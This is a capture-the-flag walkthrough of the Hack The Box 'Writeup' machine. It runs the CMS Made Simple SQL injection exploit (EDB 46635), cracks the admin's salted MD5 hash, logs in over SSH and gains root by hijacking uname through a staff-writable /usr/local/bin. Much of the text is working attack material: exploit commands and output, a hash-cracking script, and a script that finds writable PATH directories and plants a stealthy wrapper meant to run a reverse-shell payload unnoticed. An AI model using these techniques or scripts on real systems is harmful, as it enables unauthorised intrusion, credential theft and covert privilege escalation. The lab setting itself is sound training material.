Again, we start with nmap -sC -sV -Pn -p- -oA ./Writeup 10.10.10.138 (default scripts, version detection, no ping check, all 65535 ports, and every output format saved under ./Writeup).
So we are dealing with SSH and HTTP on their usual ports (22 and 80). The HTTP side serves a pretty dope/nostalgic/retro page that basically tells us there is DoS protection in place. Like that would ever stop us, right everyone? <wink, wink, nudge, nudge> It does, however, kill the usual Gobuster/Dirb/Dirbuster plan: a directory brute-force is exactly the request flood that protection is there to ban.
So brute-forcing directories is out, but nmap's default http-robots.txt script already showed /writeup as a disallowed entry in robots.txt, which is as good as an invitation. Browsing to /writeup and reading the page source shows it is running CMS Made Simple, and the copyright line (2004-2019) dates the install to 2019, which puts it somewhere between version 2.2.9 and 2.2.13. A quick searchsploit for CMS Made Simple 2.2 finds a ready-made exploit: EDB 46635, an unauthenticated blind SQL injection (CVE-2019-9053) in the News module of versions before 2.2.10, which pulls the admin user's salt and password hash out of the database and can crack the hash against a wordlist for us.
So, let's run that and see what happens!
python 46635 -u http://10.10.10.138/writeup --crack -w /usr/share/wordlists/rockyou.txt
[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: email@example.com
[+] Password found: 62def4866937f08cc13bab43bb14e6f7
[+] Password cracked: raykayjay9
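The last line of that output is the exploit doing the cracking for us, and it helps to know what it is actually computing. CMS Made Simple 2.2 stores md5(salt + password), with the salt being a site-wide value that the same injection pulls out of the database, so the hash can also be handed to hashcat mode 20 (md5($salt.$pass)). The script below is an added example, not part of the original writeup or of the 46635 exploit: it re-does the cracking step with the salt and hash from the output above against a small constructed candidate list, and shows how to stream a real wordlist such as rockyou.txt, which is not clean UTF-8 and must be read as raw bytes.

```python
import hashlib
from typing import Iterable, Optional

# Salt and hash copied from the exploit output above. The candidate list is
# constructed for this example; a real run walks the whole of rockyou.txt.
SALT = "5a599ef579066807"
TARGET_HASH = "62def4866937f08cc13bab43bb14e6f7"
CANDIDATES = [b"password", b"letmein", b"writeup2019", b"raykayjay9", b"jkr"]


def cms_hash(salt: str, password: bytes) -> str:
    """CMS Made Simple 2.2 user hash: md5(salt + password), hex encoded.

    The password is taken as raw bytes so that whatever bytes sit in the
    wordlist are hashed exactly as the CMS would have hashed them.
    """
    return hashlib.md5(salt.encode("utf-8") + password).hexdigest()


def crack_hash(target_hash: str, salt: str, candidates: Iterable[bytes]) -> Optional[str]:
    """Return the first candidate whose salted MD5 equals target_hash, else None.

    Candidates may come straight from a file opened in binary mode, so trailing
    line endings are stripped; the target is normalised because dumps are
    sometimes upper-case.
    """
    target_hash = target_hash.strip().lower()
    for candidate in candidates:
        candidate = candidate.rstrip(b"\r\n")
        if cms_hash(salt, candidate) == target_hash:
            return candidate.decode("utf-8", errors="replace")
    return None


def crack_from_wordlist(target_hash: str, salt: str, wordlist_path: str) -> Optional[str]:
    """Stream a wordlist line by line.

    rockyou.txt contains bytes that are not valid UTF-8, so it is opened in
    binary mode rather than letting a stray byte abort the whole crack.
    """
    with open(wordlist_path, "rb") as wordlist:
        return crack_hash(target_hash, salt, wordlist)


if __name__ == "__main__":
    print(crack_hash(TARGET_HASH, SALT, CANDIDATES))  # raykayjay9
    # On a real engagement:
    # print(crack_from_wordlist(TARGET_HASH, SALT, "/usr/share/wordlists/rockyou.txt"))
```

Knowing the exact construction is what lets you move the job to hashcat or John when the exploit's own Python loop is too slow for a big wordlist, and lets you sanity-check a "cracked" result by recomputing the hash before you start spraying it at SSH.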
Now we can SSH in as jkr with raykayjay9 as the password. Running LinEnum shows that jkr is in a group called staff. That is not a group you see on every box; is there anything special about it? On Debian, staff is a legacy group meant to let non-root users maintain /usr/local, which is exactly the kind of write access worth a closer look.
It looks like we can do pretty much anything in /usr/local, since staff owns it. Still not seeing an easy win here. Let's check the PATH variables.
Well, there's something. We belong to the staff group, which owns everything in /usr/local, and /usr/local/bin comes before /usr/bin and /bin in the PATH, so it is the first place searched when a command is invoked by its bare name. That only pays off if some privileged process invokes such a command on our behalf: the PATH that matters is the caller's, not ours, and the caller has to use a bare name rather than an absolute path. First attempt: drop a fake vim (a simple command makes a good decoy) containing a reverse-shell call into /usr/local/bin and see whether a new login runs it as root. The answer is no, because nothing run at login ever calls vim. New SSH sessions do appear to run uname at login, though, so let's plant the fake as /usr/local/bin/uname instead.
It looks like uname did the trick! Grab your goodies (flags, /etc/shadow, ifconfig output, etc.), clean the fake out of /usr/local/bin so other logins keep working, and you are finished!
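Two things decide whether the trick above works: whether a directory we can write to sits ahead of the real binary on the caller's PATH, and whether the fake still behaves like the real command so the login that triggers it does not visibly break. The script below is an added example, not code from the original writeup: it answers the first question for any PATH string, plants a wrapper that runs a payload and then execs the real binary with the original arguments, and exercises the whole thing in a scratch directory (a stand-in /bin/uname, a writable stand-in /usr/local/bin, and a marker file instead of a reverse shell) so it runs without root. Against the box you would pass the privileged caller's PATH and /bin/uname, and a payload such as the writeup's reverse shell.

```python
import os
import shutil
import subprocess
import tempfile


def hijackable_dirs(path_string: str, real_bin: str) -> list:
    """Directories in path_string that are searched before the one holding
    real_bin and that the current user can write to.

    A bare command name resolves to the first hit along PATH, so any writable
    directory ahead of /bin or /usr/bin lets us shadow the command. Feed this
    the PATH of the *privileged caller* (the login-time process in the writeup),
    not the PATH of your own shell. realpath() is used so a merged-/usr box
    (/bin -> /usr/bin) compares correctly.
    """
    real_dir = os.path.realpath(os.path.dirname(real_bin))
    hijackable = []
    for directory in path_string.split(":"):
        if not directory:
            continue
        if os.path.realpath(directory) == real_dir:
            break  # everything after this is searched too late to matter
        if os.path.isdir(directory) and os.access(directory, os.W_OK):
            hijackable.append(directory)
    return hijackable


def plant_wrapper(directory: str, real_bin: str, payload: str) -> str:
    """Write a shell wrapper named after real_bin into directory; return its path.

    The wrapper runs the payload and then execs the real binary with the
    original arguments, so whoever called 'uname' still gets genuine uname
    output and nothing in the login banner looks off.
    """
    wrapper = os.path.join(directory, os.path.basename(real_bin))
    with open(wrapper, "w") as f:
        f.write(f'#!/bin/sh\n{payload}\nexec {real_bin} "$@"\n')
    os.chmod(wrapper, 0o755)
    return wrapper


def simulate_login_hijack() -> dict:
    """Rebuild the writeup's scenario in a scratch directory (no root needed)."""
    root = tempfile.mkdtemp()
    sys_bin = os.path.join(root, "bin")           # plays /bin
    local_bin = os.path.join(root, "local_bin")   # plays staff-writable /usr/local/bin
    os.makedirs(sys_bin)
    os.makedirs(local_bin)

    # Constructed stand-in for the real uname binary.
    real_uname = os.path.join(sys_bin, "uname")
    with open(real_uname, "w") as f:
        f.write("#!/bin/sh\necho Linux-from-real-uname\n")
    os.chmod(real_uname, 0o755)

    marker = os.path.join(root, "pwned")
    caller_path = f"{local_bin}:{sys_bin}"        # the privileged caller's PATH
    writable = hijackable_dirs(caller_path, real_uname)
    plant_wrapper(writable[0], real_uname, f"touch {marker}")  # payload stands in for the reverse shell

    # Resolve 'uname' the way the caller would, then run it with its usual arguments.
    resolved = shutil.which("uname", path=caller_path)
    output = subprocess.run([resolved, "-a"], capture_output=True, text=True).stdout.strip()
    return {
        "root": root,
        "hijackable": writable,
        "resolved": resolved,
        "output": output,
        "payload_ran": os.path.exists(marker),
    }


if __name__ == "__main__":
    result = simulate_login_hijack()
    print(result)
    shutil.rmtree(result["root"])
```

The exec-through at the end of the wrapper is the part worth copying: the vim decoy failed silently because nothing privileged ever called it, but a uname decoy that printed nothing would have been noticed by the next person to log in, and a wrapper that keeps the real output is both stealthier and easier to leave in place until you have your shell.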